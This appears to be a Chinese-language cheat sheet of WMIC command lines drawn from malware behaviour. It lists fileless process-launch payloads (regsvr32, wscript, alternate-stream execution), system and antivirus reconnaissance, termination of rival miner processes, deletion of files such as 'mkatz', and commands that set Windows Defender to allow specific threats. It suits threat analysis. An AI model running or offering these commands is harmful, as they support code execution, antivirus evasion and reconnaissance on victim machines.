通过wmic 无文件攻击的例子
案例:
Payload:
wmic process call create "C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings"
C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
wmic.exe process call create 'regsvr32 -s C:\Users\Public\connectfront.xref'
WMIC Process Call Create "C:\Windows\System32\Wscript.exe //NOLOGO C:\Users\admin\AppData\Local\Temp\C-PDI-C-Cpy-T.vbs"
wmic process call create "C:\ProgramData\Chrome\PacketVMArranger.exe"
wmic process call create '"C:\Users\admin\AppData\Roaming:ApplicationData"'
通过wmic读取系统信息
案例:
payload:
"wmic" os get Caption /format:list
"wmic" path win32_VideoController get name /format:list
"wmic" os get Caption /format:list
WMIC OS GET LocalDateTime /value 获取时间
WMIC OS GET LastBootUpTime /value
wmic os get osarchitecture /value
wmic ComputerSystem get HypervisorPresent /format:list 看hyp是否存在
wmic ComputerSystem get PartOfDomain /format:list
wmic ComputerSystem get PCSystemType /format:list
wmic logicaldisk where (caption="C:") get filesystem /value 我的主机返回NTFS
WMIC PATH WIN32_OperatingSystem get OSLanguage /format:list
WMIC OS GET NumberOfLicensedUsers /value
WMIC OS GET PortableOperatingSystem /value
WMIC PATH WIN32_OperatingSystem get DataExecutionPrevention_32BitApplications /format:list 我的机器返回:DataExecutionPrevention_32BitApplications=TRUE
WMIC PATH WIN32_OperatingSystem get DataExecutionPrevention_Available /format:list
WMIC PATH WIN32_OperatingSystem get DataExecutionPrevention_Drivers /format:list
WMIC CSPRODUCT GET NAME /format:list
“wmic csproduct get vendor,name,identifyingnumber”可显示主机型号
"wmic" path win32_VideoController get name /format:list
"wmic" os get Caption /format:list 我的主机返回:Caption=Microsoft Windows 10 专业版
通过wmic结束进程
案例:
payload:
wmic process where "name='systems.exe' and ExecutablePath='C:\\Windows\\debug\\NAT\\systems.exe'" call Terminate
wmic process where "name='TrustedInsteller.exe' and ExecutablePath='C:\\Program Files\\Common Files\\Services\\TrustedInsteller.exe'" call Terminate
wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\inetsrv\\102\\svchost.exe'" call Terminate
wmic process where "name='LDE.exe' and ExecutablePath='C:\\ProgramData\\WinTcpAutoProxySvc\\LDE.exe'" call Terminate
wmic process where "name='taskmgr.exe' and ExecutablePath='C:\\Windows\\Temp\\locales\\taskmgr.exe'" call Terminate
wmic process where "name='service.exe' and ExecutablePath='C:\\Windows\\data\\service.exe'" call Terminate
wmic process where "name='myminer.exe' and ExecutablePath='C:\\Windows\\temp\\winstart\\myminer.exe'" call Terminate
wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\SysWOW64\\drivers\\svchost.exe'" call Terminate
wmic datafile where "drive='c:' and Path = '\\windows\\temp\\' and FileName = 'm' and Extension = 'ps1'" call delete
wmic datafile where "drive = 'c:' and Path = '\\windows\\temp\\' and FileName = 'mkatz' and Extension = 'ini'" call delete
wmic process where name="system" call terminate
wmic process where name="unitezip.exe" call terminate
通过wmic更改特定恶意软件的默认操作
Payload:
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
更改特定恶意软件的默认操作,Action 6 (Allow)将它用于威胁 id Name=Behavior:Win32/Execution.LR!ml&ThreatID=2147737007,修改策略。
补充:
Windows Defender
Windows Defender (after update 1.293.1336.0) blocks StaffCop module for file monitoring. To check if it was blocked or not, we should check the availability of the file:
C:\Windows\System32\drivers\CaptureFileMonitor64.sys
If this file can’t be found - you should perform the following actions.
Add exclusuions
In cmd:
WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=252013 ThreatIDDefaultAction_Actions=6
通过wmic读取杀毒软件列表
案例:
Uses WMIC.EXE to obtain a list of AntiViruses
- cmd.exe (PID: 3392)
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
我的主机返回:
displayName
QiAnXin Skylar
Windows Defender
火绒安全软件
